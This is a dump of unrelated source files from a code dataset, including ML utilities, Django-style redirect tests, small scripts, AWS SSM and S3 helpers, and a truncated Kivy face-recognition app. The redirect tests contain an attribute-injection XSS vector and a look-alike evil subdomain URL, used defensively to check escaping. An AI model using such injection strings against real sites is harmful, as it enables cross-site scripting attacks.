import utils\nimport torch.nn.functional as F\nimport numpy as np\n\n__all__ = ['FID']\n\n\nclass FID(MultiImageMetric):\n    def __init__(self, input_type, eps=1e-6) -> None:\n        super().__init__()\n        if input_type not in ['image', 'feature']:\n            msg = 'input_type should be image or feature, but got {}'.format(\n                input_type)\n            raise ValueError(msg)\n\n        self.input_type = input_type\n        self.eps = eps\n\n        if input_type == 'image':\n            self.inception = model.fid.InceptionV3()\n            self.inception.eval()\n\n    def calc(\n            self, images_a: Union[torch.Tensor, List[torch.Tensor]],\n            images_b: Union[torch.Tensor, List[torch.Tensor]]) -> torch.Tensor:\n        if self.input_type == 'feature':\n            features_a = images_a\n            features_b = images_b\n        else:\n            features_a = self.calc_feature(images_a)\n            features_b = self.calc_feature(images_b)\n\n        mu_a = torch.mean(features_a, dim=0)\n        mu_b = torch.mean(features_b, dim=0)\n        sigma_a = torch.cov(features_a.t())\n        sigma_b = torch.cov(features_b.t())\n        diff_mu = mu_a - mu_b\n        covmean, error = utils.sqrtm_newton_schulz(sigma_a.mm(sigma_b),\n                                                   num_iters=100)\n\n        if not torch.isfinite(covmean).all():\n            offset = utils.to_device(\n                torch.eye(sigma_a.size(0), dtype=sigma_a.dtype) * self.eps,\n                utils.get_device(sigma_a))\n            covmean, error = utils.sqrtm_newton_schulz(\n                (sigma_a + offset).mm(sigma_b + offset), num_iters=100)\n\n        fid = diff_mu.dot(diff_mu) + torch.trace(sigma_a + sigma_b -\n                                                 2 * covmean)\n        return fid\n\n    def calc_feature(self, images: Union[torch.Tensor, List[torch.Tensor]]):\n        if not hasattr(self, 'inception'):\n            self.inception = model.fid.InceptionV3()\n            self.inception.eval()\n\n        images = [\n            F.interpolate(image.unsqueeze(0),\n                          size=(299, 299),\n                          mode='bilinear',\n                          align_corners=False) for image in images\n        ]\n        images = torch.cat(images, dim=0)\n        images = 2 * images - 1\n        features = self.inception(images)[0].squeeze(2).squeeze(2)\n        return features\n","sub_path":"src/iqapt/fid.py","file_name":"fid.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"239477677","text":"import torch\nimport spacy\nfrom torchtext.data.metrics import bleu_score\n\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nimport sys\n\n\ndef translate_sentence_ger(model, sentence, german, english, device, max_length=50):\n    # Load german tokenizer\n    spacy_ger = spacy.load(\"de\")\n\n    # Create tokens using spacy and everything in lower case (which is what our vocab is)\n    if type(sentence) == str:\n        tokens = [token.text.lower() for token in spacy_ger(sentence)]\n    else:\n        tokens = [token.lower() for token in sentence]\n\n    # Add <sos> and <eos> in beginning and end respectively\n    tokens.insert(0, german.init_token)\n    tokens.append(german.eos_token)\n\n    # Go through each german token and convert to an index\n    text_to_indices = [german.vocab.stoi[token] for token in tokens]\n\n    # Convert to Tensor\n    sentence_tensor = torch.LongTensor(text_to_indices).unsqueeze(1).to(device)\n\n    outputs = [english.vocab.stoi[\"<sos>\"]]\n    for i in range(max_length):\n        trg_tensor = torch.LongTensor(outputs).unsqueeze(1).to(device)\n\n        with torch.no_grad():\n            output = model(sentence_tensor, trg_tensor)\n\n        best_guess = output.argmax(2)[-1, :].item()\n        outputs.append(best_guess)\n\n        if best_guess == english.vocab.stoi[\"<eos>\"]:\n            break\n\n    translated_sentence = [english.vocab.itos[idx] for idx in outputs]\n    # remove start token\n    return translated_sentence[1:]\n\n\ndef translate_sentence_en(model, sentence, english, german, device, max_length=50):\n    # 
Load english tokenizer\n    spacy_en = spacy.load(\"en\")\n\n    # Create tokens using spacy and everything in lower case (which is what our vocab is)\n    if type(sentence) == str:\n        tokens = [token.text.lower() for token in spacy_en(sentence)]\n    else:\n        tokens = [token.lower() for token in sentence]\n    print(\"length of english sentence is: \", len(tokens))\n    print(f\"The english sentence is: {sentence}\")\n    # Add <sos> and <eos> in beginning and end respectively\n    tokens.insert(0, english.init_token)\n    tokens.append(english.eos_token)\n\n    # Go through each english token and convert to an index\n    text_to_indices = [english.vocab.stoi[token] for token in tokens]\n\n    # Convert to Tensor\n    sentence_tensor = torch.LongTensor(text_to_indices).unsqueeze(1).to(device)\n\n    outputs = [german.vocab.stoi[\"<sos>\"]]\n    for i in range(max_length):\n        trg_tensor = torch.LongTensor(outputs).unsqueeze(1).to(device)\n\n        with torch.no_grad():\n            output = model(sentence_tensor, trg_tensor)\n\n        best_guess = output.argmax(2)[-1, :].item()\n        outputs.append(best_guess)\n\n        if best_guess == german.vocab.stoi[\"<eos>\"]:\n            break\n\n    translated_sentence = [german.vocab.itos[idx] for idx in outputs]\n    print(f\"length of translated sentence is: \", len(translated_sentence))\n    print(f\"the translated german sentence is: {translated_sentence}\")\n    # remove start token\n    return translated_sentence[1:]\n\n\ndef bleu(data, model, english, german, device):\n    model.eval()\n    targets = []\n    outputs = []\n\n    for example in data:\n        src = vars(example)[\"src\"]\n        trg = vars(example)[\"trg\"]\n\n        prediction = translate_sentence_en(model, src, english, german, device)\n        prediction = prediction[:-1]  # remove <eos> token\n\n        targets.append([trg])\n        outputs.append(prediction)\n\n    return bleu_score(outputs, targets)\n\n\ndef save_checkpoint(state, filename):\n    print(\"=> Saving checkpoint\")\n    torch.save(state, filename)\n\n\ndef load_checkpoint(checkpoint, model, optimizer):\n    print(\"=> Loading checkpoint\")\n    model.load_state_dict(checkpoint[\"state_dict\"])\n    optimizer.load_state_dict(checkpoint[\"optimizer\"])","sub_path":"german-english-transformer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487704224","text":"from os import path\n\nfrom django.conf import settings\n\nfrom mock import patch\nfrom nose.tools import assert_not_equal, eq_, ok_\n\nimport amo.tests\nfrom amo.utils import ImageCheck\nfrom mkt.site.utils import (get_outgoing_url, linkify_bounce_url_callback,\n                            linkify_with_outgoing)\n\ndef test_outgoing_url():\n    redirect_url = settings.REDIRECT_URL\n    secretkey = settings.REDIRECT_SECRET_KEY\n    exceptions = settings.REDIRECT_URL_WHITELIST\n    settings.REDIRECT_URL = 'http://example.net'\n    settings.REDIRECT_SECRET_KEY = 'sekrit'\n    settings.REDIRECT_URL_WHITELIST = ['nicedomain.com']\n\n    try:\n        myurl = 'http://example.com'\n        s = get_outgoing_url(myurl)\n\n        # Regular URLs must be escaped.\n        eq_(s,\n            'http://example.net/bc7d4bb262c9f0b0f6d3412ede7d3252c2e311bb1d55f6'\n            '2315f636cb8a70913b/'\n            'http%3A//example.com')\n\n        # No double-escaping of outgoing URLs.\n        s2 = get_outgoing_url(s)\n        eq_(s, s2)\n\n        evil = settings.REDIRECT_URL.rstrip('/') + '.evildomain.com'\n        s = get_outgoing_url(evil)\n        assert_not_equal(s, evil,\n                         'No subdomain abuse of double-escaping protection.')\n\n        nice = 'http://nicedomain.com/lets/go/go/go'\n        eq_(nice, get_outgoing_url(nice))\n\n    finally:\n        settings.REDIRECT_URL = redirect_url\n        
settings.REDIRECT_SECRET_KEY = secretkey\n settings.REDIRECT_URL_WHITELIST = exceptions\n\n\ndef test_outgoing_url_dirty_unicode():\n bad = (u'http://chupakabr.ru/\\u043f\\u0440\\u043e\\u0435\\u043a\\u0442\\u044b/'\n u'\\u043c\\u0443\\u0437\\u044b\\u043a\\u0430-vkontakteru/')\n get_outgoing_url(bad) # bug 564057\n\n\ndef test_outgoing_url_query_params():\n url = 'http://xx.com?q=1&v=2'\n fixed = get_outgoing_url(url)\n assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed\n\n url = 'http://xx.com?q=1&v=2'\n fixed = get_outgoing_url(url)\n assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed\n\n # Check XSS vectors.\n url = 'http://xx.com?q=1&v=2\" style=\"123\"'\n fixed = get_outgoing_url(url)\n assert fixed.endswith('%3A//xx.com%3Fq=1&v=2%22%20style=%22123%22'), fixed\n\n\n@patch('mkt.site.utils.get_outgoing_url')\ndef test_linkify_bounce_url_callback(mock_get_outgoing_url):\n mock_get_outgoing_url.return_value = 'bar'\n\n res = linkify_bounce_url_callback({'href': 'foo'})\n\n # Make sure get_outgoing_url was called.\n eq_(res, {'href': 'bar'})\n mock_get_outgoing_url.assert_called_with('foo')\n\n\n@patch('mkt.site.utils.linkify_bounce_url_callback')\ndef test_linkify_with_outgoing_text_links(mock_linkify_bounce_url_callback):\n def side_effect(attrs, new=False):\n attrs['href'] = 'bar'\n return attrs\n\n mock_linkify_bounce_url_callback.side_effect = side_effect\n\n # Without nofollow.\n res = linkify_with_outgoing('a text http://example.com link', nofollow=False)\n eq_(res, 'a text http://example.com link')\n\n # With nofollow (default).\n res = linkify_with_outgoing('a text http://example.com link')\n ok_(res in [\n 'a text http://example.com link',\n 'a text http://example.com link'])\n\n res = linkify_with_outgoing('a text http://example.com link', nofollow=True)\n ok_(res in [\n 'a text http://example.com link',\n 'a text http://example.com link'])\n\n\n@patch('mkt.site.utils.linkify_bounce_url_callback')\ndef test_linkify_with_outgoing_markup_links(mock_linkify_bounce_url_callback):\n def side_effect(attrs, new=False):\n attrs['href'] = 'bar'\n return attrs\n\n mock_linkify_bounce_url_callback.side_effect = side_effect\n\n # Without nofollow.\n res = linkify_with_outgoing(\n 'a markup link with text',\n nofollow=False)\n eq_(res, 'a markup link with text')\n\n # With nofollow (default).\n res = linkify_with_outgoing(\n 'a markup link with text')\n ok_(res in ['a markup link with text',\n 'a markup link with text'])\n\n res = linkify_with_outgoing(\n 'a markup link with text',\n nofollow=True)\n ok_(res in ['a markup link with text',\n 'a markup link with text'])\n\n\ndef get_image_path(name):\n return path.join(settings.ROOT, 'apps', 'amo', 'tests', 'images', name)\n\n\nclass TestAnimatedImages(amo.tests.TestCase):\n\n def test_animated_images(self):\n img = ImageCheck(open(get_image_path('animated.png')))\n assert img.is_animated()\n img = ImageCheck(open(get_image_path('non-animated.png')))\n assert not img.is_animated()\n\n img = ImageCheck(open(get_image_path('animated.gif')))\n assert img.is_animated()\n img = ImageCheck(open(get_image_path('non-animated.gif')))\n assert not img.is_animated()\n\n def test_junk(self):\n img = ImageCheck(open(__file__, 'rb'))\n assert not img.is_image()\n img = ImageCheck(open(get_image_path('non-animated.gif')))\n assert 
img.is_image()\n","sub_path":"mkt/site/tests/test_utils_.py","file_name":"test_utils_.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238718605","text":"from collections import OrderedDict\nimport logging as log\nfrom exchange.order_books.book_price_q import BookPriceQ\n\n\nclass Node:\n\tdef __init__(self, data, prev = None, next = None):\n\t\tself.data = data\n\t\tself.next = next\n\t\tself.prev = prev\n\nclass SortedIndexedDefaultList:\n\t'''\n\tThis is an indexable, double-linked linked list with insertions coming always form iteration from the start.\n\tDelete: O(1)\n\tInsert: O(n) - but o(1) to put at front\n\tRead: : O(1)\n\n\tRetrieving a missing element will spur the creation of the element via the initialized.\n\t'''\n\tdef __init__(self, index_func, initializer, index_multiplier = 1 ):\n\t\tself.start = None\n\t\tself.end = None\n\t\tself.index_func = index_func\n\t\tself.index_multiplier = index_multiplier\n\t\tself.index = {}\n\t\tself.initializer = initializer\n\n\tdef __str__(self):\n\t\treturn ',\\n'.join([str(i) for i in self.ascending_items()])\n\n\n\tdef insert(self, data):\n\t\tid = self.index_func(data)\n\t\tif id in self.index:\n\t\t\traise KeyError\n\t\telse:\n\t\t\tn=Node(data = data)\n\t\t\tself.index[id] = n\n\n\t\t\tif self.start is None:\t #insert into linked list from start\n\t\t\t\tself.start = n\n\t\t\t\tself.end = n\n\t\t\t\treturn n.data\n\t\t\telif self.index_multiplier*self.index_func(self.start.data) > self.index_multiplier*id: #inserting at start\n\t\t\t\tself.start.prev = n\n\t\t\t\tn.next = self.start\n\t\t\t\tself.start = n\n\t\t\t\treturn n.data\n\t\t\telse:\n\t\t\t\tcurrent = self.start \n\t\t\t\twhile current.next is not None and self.index_multiplier*self.index_func(current.next.data) <= self.index_multiplier*id:\n\t\t\t\t\tcurrent = current.next\n\n\t\t\t\tif current.next is None: #insert into end of linked list\n\t\t\t\t\tcurrent.next = n\n\t\t\t\t\tn.prev = current\n\t\t\t\t\tself.end = n\n\t\t\t\t\treturn current.next.data\n\t\t\t\telse:\t\t\t\t\t#insert into middle of linked list\n\t\t\t\t\tn.next = current.next\n\t\t\t\t\tn.prev = current\n\t\t\t\t\tcurrent.next.prev = n\n\t\t\t\t\tcurrent.next = n\n\t\t\t\t\treturn current.next.data\n\n\tdef __contains__(self, index):\n\t\treturn index in self.index\n\n\tdef __getitem__(self, index):\n\t\tif index not in self.index:\n\t\t\treturn self.insert(self.initializer(index))\n\t\telse:\n\t\t\treturn self.index[index].data\t\n\n\tdef remove(self, index):\n\t\ttry:\n\t\t\tnode = self.index[index]\n\t\texcept KeyError as e:\n\t\t\tlog.debug('node at {} already removed'.format(index))\n\t\t\treturn\n\t\tif node == self.start:\n\t\t\tself.start = node.next\n\t\telse:\n\t\t\tprev = node.prev\n\t\t\tprev.next = node.next\n\n\t\tif node == self.end:\n\t\t\tself.end = node.prev\n\t\telse:\n\t\t\tnext = node.next\n\t\t\tnext.prev = node.prev\n\n\t\tdel self.index[index]\n\n\tdef ascending_items(self):\n\t\tcurrent = self.start\n\t\twhile current is not None:\n\t\t\tyield current.data\n\t\t\tcurrent = current.next\n\n\tdef descending_items(self):\n\t\tcurrent = self.end\n\t\twhile current is not None:\n\t\t\tyield current.data\n\t\t\tcurrent = current.prev\n\n\nif __name__ == '__main__':\n\tl = SortedIndexedDefaultList(index_func = lambda bpq : bpq.price, initializer = lambda price: 
BookPriceQ(price))\n\tprint(l)\n\tl.insert(BookPriceQ(10))\n\tprint(l)\n\tl.insert(BookPriceQ(11))\n\tprint(l)\n\tl.insert(BookPriceQ(9))\n\tprint(l)\n\tl.remove(9)\n\tprint(l)\n\n","sub_path":"exchange_server/exchange/order_books/list_elements.py","file_name":"list_elements.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233211623","text":"from flask import Flask, render_template, request\r\nfrom database import add_user, read_from_db\r\napp = Flask(__name__)\r\n\r\n@app.route('/', methods=['POST', 'GET'])\r\ndef index():\r\n    name = 'Noname'\r\n    if request.method == 'POST':\r\n        name = request.form['name']\r\n        add_user(name)\r\n\r\n    _data = read_from_db()\r\n    return render_template('index.html', data=_data)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165535565","text":"from django.conf.urls import url, include\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework.routers import DefaultRouter\nfrom .views import BlogPostViewSet\n\n\napi_blog_post_list = BlogPostViewSet.as_view(\n    {\n        'get': 'list',\n        'post': 'create',\n    }\n)\napi_blog_post_detail = BlogPostViewSet.as_view(\n    {\n        'get': 'retrieve',\n        'put': 'update',\n        'patch': 'partial_update',\n        'delete': 'destroy',\n    }\n)\nuser_blog_post_detail = BlogPostViewSet.as_view(\n    {\n        'get': 'detail_view'\n    }\n)\nuser_blog_post_list = BlogPostViewSet.as_view(\n    {\n        'get': 'list_view'\n    }\n)\n\nurlpatterns = [\n    url(r'^api/$', api_blog_post_list, name='blogpost-list'),\n    url(r'^$', user_blog_post_list, name='blogpost-list-user'),\n    url(r'^api/(?P<pk>[0-9]+)/$', api_blog_post_detail, name='blogpost-detail'),\n    url(\n        r'^(?P<pk>[0-9]+)/$',\n        user_blog_post_detail,\n        name='blogpost-detail-user'\n    ),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474021736","text":"#A1 A2 A4 A6\nimport xlrd\nimport random\nimport pylab as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.font_manager import FontProperties # font manager\n\n# set the font used for Chinese characters\nfont = FontProperties(fname=r\"consnerdi.ttf\", size=12)\nworkbook = xlrd.open_workbook(r'乙醇浓度&选择性.xlsx')\nsheet = workbook.sheet_by_index(0)\nx1 = [250, 275, 300, 350, 400]\nx2 = [0.3, 0.9, 1.68, 2.1]\nx2_ = [1.68, 2.1]\nfig = plt.figure()\nax = fig.add_subplot(projection = '3d')\n\nfor i in range(0, 5):\n    z = sheet.row_values(i)\n    x = x1[i]\n    xs = np.array(x2)\n    zs = np.array(z)\n    ax.plot(xs, zs, x, zdir='y', color='b', marker='o', alpha=0.8)\n\nworkbook_ = xlrd.open_workbook(r'乙醇浓度&选择性 B.xlsx')\nsheet_ = workbook_.sheet_by_index(0)\nfor i in range(0, 5):\n    z = sheet_.row_values(i)\n    x = x1[i]\n    xs = np.array(x2_)\n    zs = np.array(z)\n    ax.plot(xs, zs, x, zdir='y', color='r', marker='o', alpha=0.8)\n\nl1 = []\nl2 = []\nfor i in range(0, 3):\n    z = sheet.col_values(i)\n    x = x2[i]\n    xs = np.array(x1)\n    zs = np.array(z)\n    ax.plot(xs, zs, x, zdir='x', color='b', marker='o', alpha=0.8)\n\nz = sheet.col_values(3)\nx = x2[3]\nxs = np.array(x1)\nzs = np.array(z)\nax.plot(xs, zs, x, zdir='x', color='b', marker='o', alpha=0.8, label = 'A装填方式')\n\nfor i in range(0, 1):\n    z = sheet_.col_values(i)\n    x = x2_[i]\n    xs = np.array(x1)\n    zs = np.array(z)\n    
ax.plot(xs, zs, x, zdir='x', color='r', marker='o', alpha=0.8)\n\nz = sheet_.col_values(1)\nx = x2_[1]\nxs = np.array(x1)\nzs = np.array(z)\nax.plot(xs, zs, x, zdir='x', color='r', marker='o', alpha=0.8, label = 'B装填方式')\n\nplt.title('乙醇浓度与C4烯烃选择性关系图', fontproperties = font)\nax.set_xlabel('乙醇浓度', fontproperties = font)\nax.set_zlabel('C4烯烃选择性', fontproperties = font)\nax.set_ylabel('温度', fontproperties = font)\nplt.legend(loc = 'upper left', prop = font)\n#ax.legend(loc = 'upper left')\nplt.savefig(\"浓度2.png\")\nplt.show()","sub_path":"画饼/乙醇浓度&选择性.py","file_name":"乙醇浓度&选择性.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549538673","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\ndef lagrange(x,i,a):\r\n    Li = 1\r\n    for j in range(len(a)):\r\n        if (i != j):\r\n            Li *= (x-a[j])/(a[i]-a[j])\r\n    return Li\r\ndef interpol(x,a,b):\r\n    P = 0\r\n    for i in range(len(a)):\r\n        P += b[i]*lagrange(x,i,a)\r\n    return P\r\ndef interpol_fichier(fichier):\r\n    # Open file\r\n    f = open(fichier,'r')\r\n    lignes = f.readlines()\r\n    f.close()\r\n\r\n    # Add points to array a & b\r\n    a = np.zeros(len(lignes))\r\n    b = np.zeros(len(lignes))\r\n    for i in range(len(lignes)):\r\n        t = lignes[i].split()\r\n        a[i] = t[0]\r\n        b[i] = t[1]\r\n    \r\n    # Show the fixing points\r\n    plt.scatter(a,b)\r\n\r\n    # Create the linspace\r\n    abcisse = np.linspace(min(a)-0.5,max(a)+0.5,10000)\r\n    ordonne = [interpol(k,a,b) for k in abcisse]\r\n    plt.plot(abcisse,ordonne)\r\n    plt.show()\r\ninterpol_fichier(\"D:/Dev/Python/PCSI/TP 13/interpolation.txt\")","sub_path":"TP 13/ex2-bonus.py","file_name":"ex2-bonus.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417155705","text":"import time\nimport json\nimport boto3\n\n\ndef str_decode(val):\n    val = val.split('\\n')\n    ip_address = val[0]\n    launch_time = val[1]\n    uptime = int(float(val[2].split(' ', 1)[0]))\n    os_version = val[4]\n    return ip_address, launch_time, uptime, os_version\n    \ndef lambda_handler(event, context):\n\n    # boto3 client\n    client = boto3.client('ec2')\n    ssm = boto3.client('ssm')\n    \n    # getting instance information and ssm instance information\n    describeInstance = client.describe_instances()\n    ssm_describeInstance = ssm.describe_instance_information()\n\n    InstanceId=[]\n    # fetching instance id of the running instances\n    for i in describeInstance['Reservations']:\n        for instance in i['Instances']:\n            if instance[\"State\"][\"Name\"] == \"running\":\n                InstanceId.append(instance['InstanceId'])\n\n    # looping through instance ids\n    for instanceid in InstanceId:\n        # command to be executed on instance\n        response = ssm.send_command(\n            InstanceIds=[instanceid],\n            DocumentName=\"AWS-RunShellScript\",\n            Parameters={'commands': ['hostname -i; uptime -s; cat /proc/uptime; cat /etc/*_version']})\n        \n        # fetching command id for the output\n        json_response = response['Command']['CommandId']\n        time.sleep(3)\n\n        # fetching command output\n        json_output = ssm.get_command_invocation(\n            CommandId=json_response,\n            InstanceId=instanceid\n        )\n        \n        ip_address, launch_time, uptime, os_version = str_decode(str(json_output['StandardOutputContent']))\n        # print(ip_address, launch_time, uptime, os_version)\n        # print(json_output['InstanceId'])\n\n    # return the output of the most recent instance once the loop has visited every instance id\n    return 
json_output\n","sub_path":"aws/commands-ec2-lambda.py","file_name":"commands-ec2-lambda.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611131376","text":"import xlrd\nimport numpy as np\n\n\ndef read_games(games_file):\n    f = open(games_file, \"r\")\n    game_string = f.read()\n\n    games = game_string.split(\"\\n\\n\")\n\n    # final games holds a list of list where each list is a separate string representation of the game\n    final_games = [[character.strip() for line in games[i].split(\"\\n\") for character in line.split()]\n                   for i in range(len(games))]\n\n    # print(final_games)\n    return final_games\n\n\ndef read_excel_sheets(games_file):\n    final_games = []\n    workbook = xlrd.open_workbook(games_file)\n    f = open('sudoku_9x9_extreme.txt', 'w+')\n\n    for i in range(workbook.nsheets):\n        sheet = workbook.sheet_by_index(i)\n        for i in range(1, sheet.nrows, 1):\n            for character in convert_blanks_in_row_to_zeros(sheet.row_values(i)).split():\n\n                f.write(character + \" \")\n            f.write(\"\\n\")  # end of the line\n        f.write(\"\\n\")  # end of an individual game\n    # print(final_games)\n\n    f.close()\n    # return final_games\n\n\ndef convert_game(sheet):\n    game_string = \"\"\n    for i in range(1, sheet.nrows, 1):\n        game_string += convert_blanks_in_row_to_zeros(sheet.row_values(i))\n    return game_string.split()\n\n\ndef convert_blanks_in_row_to_zeros(row):\n    print(\"Row\")\n    print(row)\n    string = \"\"\n    for val in row:\n        if val == '':\n            string += \" 0 \"\n        else:\n            string += (\" \" + str(int(val)) + \" \")\n\n    print(string)\n    return string\n","sub_path":"file_parser.py","file_name":"file_parser.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565396252","text":"synset_path = \"./synset.txt\"\nimage_size = 224\n\nnr_examples_per_epoch_for_train = 12 # insert here all total nr of imagenet photos\nnr_epochs_per_decay = 350.0      # Epochs after which learning rate decays.\nmoving_average_decay = 0.9999     # The decay to use for the moving average.\nlearning_rate_decay_factor = 0.1  # Learning rate decay factor.\ninitial_learning_rate = 0.001       # Initial learning rate.\ndropout = 0.5\n\nbatch_size = 1\nmax_steps = 100 #200000\ncheckpoint_steps = 10\nsummary_steps = 10\nprint_steps = 10\n\ndict_path = \"./dict.txt\"\ncheckpoint_path = './checkpoint'\ndata_dir = \"/media/ioana/E9A4-CCE4/imagenet/\"\n# data_dir = \"./imagenet/\"\ntrain_dir = './train'\neval_dir = './eval'\nwordnet_mapping = './wordnet_mapping'\n\nretrain = True\n\n","sub_path":"vgg16_config.py","file_name":"vgg16_config.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207815617","text":"import labrad\nimport numpy\nfrom fly_processing import Interpolator\nfrom scan729 import scan729\n \ncxn = labrad.connect()\ndv = cxn.data_vault\ndv.cd(['','Calibrations', 'Double Pass 729DP'])\ndv.open(12)\ndata = dv.get().asarray\nfreq_interp = data[:,0]\nampl_interp = data[:,1]\ncxn.disconnect()\ninterp = Interpolator(freq_interp, ampl_interp)\n\nfreq_min = 160.0\nfreq_max = 250.0\nfreq_step = 1.0\n\nfreqs = numpy.arange(freq_min, freq_max + freq_step, freq_step)\nfreqs = numpy.clip(freqs, freq_min, freq_max)\nampls = interp.interpolated(freqs)\nfreqs = freqs.tolist()\nampls = ampls.tolist()\n\nparams = {\n    'frequencies_729':freqs,\n    'amplitudes_729': ampls,\n    'doppler_cooling':10*10**-3,\n    
'heating_time':1.0e-3,\n    'rabi_time':0.1e-3,#0.5*10**-3,\n    'readout_time':5*10**-3,\n    'repump_time':10*10**-3,\n    'repump_854_ampl': -3.0,\n    'repump_866_ampl': -11.0,\n    'doppler_cooling_freq':103.0,\n    'doppler_cooling_ampl':-11.0,\n    'readout_freq':107.0,\n    'readout_ampl':-11.0\n    }\nexprtParams = {\n    'startNumber': 10,\n    'iterations': 1\n    }\n\nanalysis = {\n    'threshold':30,\n    }\nexprt = scan729(params,exprtParams, analysis)\nexprt.run()","sub_path":"old_files/scan729_calibrated.py","file_name":"scan729_calibrated.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154017442","text":"\nimport boto\nimport conf\nimport sys, os\nfrom boto.s3.key import Key\nfrom time import time\nfrom boto.exception import S3ResponseError\n\nBUCKET_NAME = \"mybucket-craftdemo\"\nAWS_ACCESS_KEY_ID= conf.AWS_ACCESS_KEY\nAWS_ACCESS_SECRET_KEY = conf.AWS_SECRET_ACCESS_KEY\nDOWNLOAD_LOCATION_PATH = os.path.expanduser(\"~\") + \"/s3-drain/\"\nif not os.path.exists(DOWNLOAD_LOCATION_PATH):\n    print (\"Making download directory\")\n    os.mkdir(DOWNLOAD_LOCATION_PATH)\n\n\ndef drain_s3():\n    ts = time()\n    conn = boto.connect_s3(AWS_ACCESS_KEY_ID, AWS_ACCESS_SECRET_KEY)\n    bucket = conn.get_bucket(BUCKET_NAME)\n\n    # go through the list of files\n#    bucket_list = bucket.list(prefix='0')\n    bucket_list = bucket.list()\n    for l in bucket_list:\n        key_string = str(l.key)\n        s3_path = DOWNLOAD_LOCATION_PATH + key_string\n        try:\n            print (\"Current File is \", s3_path)\n            l.get_contents_to_filename(s3_path)\n        except (OSError,S3ResponseError) as e:\n            pass\n        # check if the file has been downloaded locally\n        if not os.path.exists(s3_path):\n            try:\n                os.makedirs(s3_path)\n            except OSError as exc:\n                # guard against race conditions\n                import errno\n                if exc.errno != errno.EEXIST:\n                    raise\n\n\n\n    print('Took {}s'.format(time() - ts))\nif __name__ == '__main__':\n    drain_s3()\n","sub_path":"bin/s3drain_iterative.py","file_name":"s3drain_iterative.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434564316","text":"import pickle\nimport os\nimport sys\n\nimport kivy\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.clock import Clock\nfrom kivy.graphics.texture import Texture\nfrom kivy.core.window import Window\nfrom kivy.core.text import LabelBase\n\nimport cv2 as cv\nimport face_recognition\nimport numpy as np\nfrom utils import image_resize\nfrom identifier import get_faces_data\nfrom collections import deque\n\n\n# Declare dependencies\n#Paths\nsys.path.append('.')\nkivy.resources.resource_add_path('.')\n\n# Kivy Font\nLabelBase.register(name = 'OpenSans', fn_regular = 'OpenSans-Regular.ttf')\n\n# Cascades\nface_cascade = cv.CascadeClassifier('cascades/haarcascade_frontalface_alt.xml')\neyes_cascade = cv.CascadeClassifier('cascades/frontalEyes35x16.xml')\nnose_cascade = cv.CascadeClassifier('cascades/Nose18x15.xml')\n\n# Faces data\nwith open('faces-data.pickle', 'rb') as file:\n    faces_data = pickle.load(file)\n\n# Glasses + Mustache files\nglasses = cv.imread(\"filters/glasses.png\", -1)\nmustache = cv.imread('filters/mustache.png',-1)\n\n# Painter globals\n# Define the upper and lower boundaries for a color to be considered \"Blue\"\nblue_lower = np.array([100, 60, 60])\nblue_upper = 
np.array([140, 255, 255])\n# Define a 5x5 kernel for erosion and dilation\nkernel = np.ones((5, 5), np.uint8)\n# Setup deques to store separate colors in separate arrays\nbpoints = [deque(maxlen=512)]\ngpoints = [deque(maxlen=512)]\nrpoints = [deque(maxlen=512)]\nbindex = 0\ngindex = 0\nrindex = 0\n# Drawing setting\ncolors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255), (255, 255, 255), (0, 0, 0), (120,120,120)]\ncolorIndex = 0\nfont = cv.FONT_HERSHEY_SIMPLEX\n\n\nclass HomeScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.capture = cv.VideoCapture(0)\n self.triger(self.update_cam)\n\n def triger(self, triger_mode): #higher order function\n Clock.unschedule(self.update_cam)\n Clock.unschedule(self.detect_faces)\n Clock.unschedule(self.identify_faces)\n Clock.unschedule(self.glasses)\n Clock.unschedule(self.painter)\n Clock.schedule_interval(triger_mode, 1/60)\n \n def update_cam(self, dt):\n # repeatly update camera frame\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n\n 